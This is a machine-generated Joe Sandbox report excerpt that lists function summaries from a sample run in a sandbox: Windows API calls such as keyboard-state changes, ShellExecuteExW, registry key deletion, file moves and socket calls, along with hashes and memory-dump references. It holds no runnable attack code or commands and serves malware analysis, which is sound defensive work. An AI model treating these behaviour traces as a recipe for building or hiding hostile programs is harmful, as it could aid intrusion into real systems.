                                                                            • Opcode ID: 9a8bb324f42c121553a9af06bda3b3867d8c8470e44d18407c5bba2930c55376
                                                                            • Instruction ID: a0920f153de7557491408005d41f72a49b95297992a4fa962e93cf89671ce91b
                                                                            • Opcode Fuzzy Hash: 9a8bb324f42c121553a9af06bda3b3867d8c8470e44d18407c5bba2930c55376
                                                                            • Instruction Fuzzy Hash: A5412575A04208AFDB20EF54D884EAABBB8FB08314F648429FD15E7360D730ED50EB51
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00863033
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-404129466
                                                                            • Opcode ID: 3b595e4bd499934d537b70ddc0f5aa2d3b666265903d9d21defbd9d2fa6511bd
                                                                            • Instruction ID: b273d4f6992c65c0b9d072b92d7118346c7e3451188125b5f2f6a725a13087b6
                                                                            • Opcode Fuzzy Hash: 3b595e4bd499934d537b70ddc0f5aa2d3b666265903d9d21defbd9d2fa6511bd
                                                                            • Instruction Fuzzy Hash: A9112B35348B96BEE7259B58EC42CAF7B9CFF15324B21002AF900E62C2DF745F4456A6
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00864312
                                                                            • LoadStringW.USER32(00000000), ref: 00864319
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0086432F
                                                                            • LoadStringW.USER32(00000000), ref: 00864336
                                                                            • _wprintf.LIBCMT ref: 0086435C
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0086437A
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00864357
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 3648134473-3128320259
                                                                            • Opcode ID: 6e8c23adfc50d0343af94d1b70550f043971774fe1b0b7888d3fbdf89787bb03
                                                                            • Instruction ID: 004cbed56e4d772cb854a97dad913f82c9c3f40a40c0a297914dd558b4c3e9fc
                                                                            • Opcode Fuzzy Hash: 6e8c23adfc50d0343af94d1b70550f043971774fe1b0b7888d3fbdf89787bb03
                                                                            • Instruction Fuzzy Hash: 250162F6900208BFE711E7A4DD89EFA776CFB08301F0005A1B745E6152EA745E854B71
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0083C1C7,00000004,00000000,00000000,00000000), ref: 00802ACF
                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0083C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00802B17
                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0083C1C7,00000004,00000000,00000000,00000000), ref: 0083C21A
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0083C1C7,00000004,00000000,00000000,00000000), ref: 0083C286
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: 26c9b801d37912458c2f5462b3589d222331850e33cf7909788455d2726912f8
                                                                            • Instruction ID: b3a09992907e1fe02a27b385d892d99bce4bf6104fa2e3b5d2c2786a656b1fa4
                                                                            • Opcode Fuzzy Hash: 26c9b801d37912458c2f5462b3589d222331850e33cf7909788455d2726912f8
                                                                            • Instruction Fuzzy Hash: 234128303046949ECBB59B2C8C8CB6F7B92FB96318F24881DE147D25E1CAB5A881D761
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 008670DD
                                                                              • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                                              • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00867114
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00867130
                                                                            • _memmove.LIBCMT ref: 0086717E
                                                                            • _memmove.LIBCMT ref: 0086719B
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008671AA
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008671BF
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 008671DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 256516436-0
                                                                            • Opcode ID: 22747426ebe1d80eff850fde46c82f620123cd2a0002b38afd6963f25fdef1d7
                                                                            • Instruction ID: d56a90d304cde2000fbe09e5e491a8667a2964f635a6c31d3458372f51f10933
                                                                            • Opcode Fuzzy Hash: 22747426ebe1d80eff850fde46c82f620123cd2a0002b38afd6963f25fdef1d7
                                                                            • Instruction Fuzzy Hash: 2F317E75900215EBCF00DFA8DC85AAEB7B8FF45710F1541B6E904EB246DB309E50CBA1
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 008861EB
                                                                            • GetDC.USER32(00000000), ref: 008861F3
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008861FE
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0088620A
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00886246
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00886257
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0088902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00886291
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008862B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 6ca8bb65719b74e3d1187f624edabac57bc57afcde7bf7125ffad1bca1a8de9c
                                                                            • Instruction ID: a014702b11b1b5a3517981b2b52cae55eb9af2dd9b530cc263c3d101049577b7
                                                                            • Opcode Fuzzy Hash: 6ca8bb65719b74e3d1187f624edabac57bc57afcde7bf7125ffad1bca1a8de9c
                                                                            • Instruction Fuzzy Hash: 2E317A72200210AFEB119F148C8AFAA3BA9FF59761F040065FE08DA292D7759C51CB60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: 605fcd0207db7932cddd76cd3988d10f488baf76ec0923eab2146db735405706
                                                                            • Instruction ID: 04a46a35453c18a8716ebfccdff65d424d581e93c47587a587965e8f722c8c84
                                                                            • Opcode Fuzzy Hash: 605fcd0207db7932cddd76cd3988d10f488baf76ec0923eab2146db735405706
                                                                            • Instruction Fuzzy Hash: 5621D4616012197BAA047615AD42FFB735EFF3036DF584020FD08D6647EB68DE1982AA
                                                                            APIs
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                              • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                                            • _wcstok.LIBCMT ref: 0086EC94
                                                                            • _wcscpy.LIBCMT ref: 0086ED23
                                                                            • _memset.LIBCMT ref: 0086ED56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                            • String ID: X
                                                                            • API String ID: 774024439-3081909835
                                                                            • Opcode ID: d35fe133f3fa6ceeac36f210bb83ab4580aff5372f740fc0a78a6525c7169950
                                                                            • Instruction ID: fe4cab7fbc9b5daa5a23f585bf7a7e9efd347b948455c319cd1343d4eddbabb4
                                                                            • Opcode Fuzzy Hash: d35fe133f3fa6ceeac36f210bb83ab4580aff5372f740fc0a78a6525c7169950
                                                                            • Instruction Fuzzy Hash: 63C139755083509FC764EF28D881A5AB7E4FF85324F01892DF999DB2A2DB30EC45CB92
                                                                            APIs
                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00876C00
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00876C21
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00876C34
                                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00876CEA
                                                                            • inet_ntoa.WSOCK32(?), ref: 00876CA7
                                                                              • Part of subcall function 0085A7E9: _strlen.LIBCMT ref: 0085A7F3
                                                                              • Part of subcall function 0085A7E9: _memmove.LIBCMT ref: 0085A815
                                                                            • _strlen.LIBCMT ref: 00876D44
                                                                            • _memmove.LIBCMT ref: 00876DAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 3619996494-0
                                                                            • Opcode ID: 507168f421d10a503e8b4d2ff7410acc2d19676ddebb16de977f44ad67d1fce5
                                                                            • Instruction ID: bc9ff6d1aa271db1d4f24c2947f6320d9bc8ba8b9140a6676a405fbabf58a16f
                                                                            • Opcode Fuzzy Hash: 507168f421d10a503e8b4d2ff7410acc2d19676ddebb16de977f44ad67d1fce5
                                                                            • Instruction Fuzzy Hash: 6481C571204600AFD750EB28DC82E6BBBA8FF84724F148518F999DB2D2EA71DD44CB52
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fe83d50528ffad9bb6a70fd4beda68b1ff80a5d71b994512a6c445bd713ecde2
                                                                            • Instruction ID: c4416e24900c006c6539f06fbc35cd4116717909c9b507493b451da044fd97f6
                                                                            • Opcode Fuzzy Hash: fe83d50528ffad9bb6a70fd4beda68b1ff80a5d71b994512a6c445bd713ecde2
                                                                            • Instruction Fuzzy Hash: 67718C70900509EFDF54CF98CC89ABEBB79FF85324F108159F915EA2A1C734AA11CBA4
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0087F448
                                                                            • _memset.LIBCMT ref: 0087F511
                                                                            • ShellExecuteExW.SHELL32(?), ref: 0087F556
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                              • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                                            • GetProcessId.KERNEL32(00000000), ref: 0087F5CD
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0087F5FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                            • String ID: @
                                                                            • API String ID: 3522835683-2766056989
                                                                            • Opcode ID: a56503dafa0b91ebd5789f6cb83364ded71208c46e133c06b4929c52a25f10bf
                                                                            • Instruction ID: 88fe66f6e8ea97d60037d6dbc912cfc83a7ab306eecbd4a0158fa929b2baf20c
                                                                            • Opcode Fuzzy Hash: a56503dafa0b91ebd5789f6cb83364ded71208c46e133c06b4929c52a25f10bf
                                                                            • Instruction Fuzzy Hash: F4617CB5A006199FCB14DF69C8819AEBBF5FF48310F148069E959EB392CB30ED41CB95
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 00860F8C
                                                                            • GetKeyboardState.USER32(?), ref: 00860FA1
                                                                            • SetKeyboardState.USER32(?), ref: 00861002
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00861030
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0086104F
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00861095
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008610B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 75e3028f52b6dad84b062740812b64ced3ad652ddc717bd0e6e761842ac29233
                                                                            • Instruction ID: 29ab680d425660ce2eb81222eed6b1e15fd981a91581effebabeb6f459c89e76
                                                                            • Opcode Fuzzy Hash: 75e3028f52b6dad84b062740812b64ced3ad652ddc717bd0e6e761842ac29233
                                                                            • Instruction Fuzzy Hash: 9451D260604BD53DFF3642388C19BB6BEA9BB06304F0D8589E2D4C58D3D699DCD8DB52
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 00860DA5
                                                                            • GetKeyboardState.USER32(?), ref: 00860DBA
                                                                            • SetKeyboardState.USER32(?), ref: 00860E1B
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00860E47
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00860E64
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00860EA8
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00860EC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 21038db1ca45a6124ccf2de9593c5f490063c2aa3320f863def537b25190775d
                                                                            • Instruction ID: 47fe7216e3be4682df1d80ac3fc9c62dc10af48aa6b8a5caf85adb43847e7d28
                                                                            • Opcode Fuzzy Hash: 21038db1ca45a6124ccf2de9593c5f490063c2aa3320f863def537b25190775d
                                                                            • Instruction Fuzzy Hash: E95124A05486E53DFB3283648C45B7B7FA9FB06300F098988E1D4CA4C3D396AC88DB54
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsncpy$LocalTime
                                                                            • String ID:
                                                                            • API String ID: 2945705084-0
                                                                            • Opcode ID: f6f09ac9b8c2f9d4138f2c7a287e0fca5bd96e63a41129e4da6e5f3dd77eed7a
                                                                            • Instruction ID: 88d1ded013ae6db91eb1e5ae3e5521303c7d7fbf222f99636fb437434ac25adb
                                                                            • Opcode Fuzzy Hash: f6f09ac9b8c2f9d4138f2c7a287e0fca5bd96e63a41129e4da6e5f3dd77eed7a
                                                                            • Instruction Fuzzy Hash: E3419565C11628B6CB11EBB89C469CFB3B8FF04310F504556F618E3121EA34A2C5C7A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: S
                                                                            • API String ID: 0-2858979982
                                                                            • Opcode ID: 94315e4625c95404833865b03e4b6e61954b85f45f6aa78a2ca26a8850b4ee97
                                                                            • Instruction ID: 403e9c2d089aa4eda0b07298b21a53ba4c4f1609be251a895a3ed2f216004f04
                                                                            • Opcode Fuzzy Hash: 94315e4625c95404833865b03e4b6e61954b85f45f6aa78a2ca26a8850b4ee97
                                                                            • Instruction Fuzzy Hash: D941A539904504AFE728EF68CC8CFA9BBA8FB09310F150266F916E72E1D770AD51DB51
                                                                            APIs
                                                                              • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863697,?), ref: 0086468B
                                                                              • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863697,?), ref: 008646A4
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 008636B7
                                                                            • _wcscmp.LIBCMT ref: 008636D3
                                                                            • MoveFileW.KERNEL32(?,?), ref: 008636EB
                                                                            • _wcscat.LIBCMT ref: 00863733
                                                                            • SHFileOperationW.SHELL32(?), ref: 0086379F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 1377345388-1173974218
                                                                            • Opcode ID: c3078f6016b8525d720c12192f8582167b48926ee218e26a9a327d85541d6131
                                                                            • Instruction ID: 8254fc1b036b2858d1c10606e8e916b17fd2898c5c58cf965236183cf8b41f84
                                                                            • Opcode Fuzzy Hash: c3078f6016b8525d720c12192f8582167b48926ee218e26a9a327d85541d6131
                                                                            • Instruction Fuzzy Hash: 99418171508344AEC752EF68D4419DFB7E8FF99340F00182EB49AC3251EA34D689C753
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00880FD4
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00880FFE
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008810B5
                                                                              • Part of subcall function 00880FA5: RegCloseKey.ADVAPI32(?), ref: 0088101B
                                                                              • Part of subcall function 00880FA5: FreeLibrary.KERNEL32(?), ref: 0088106D
                                                                              • Part of subcall function 00880FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00881090
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00881058
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
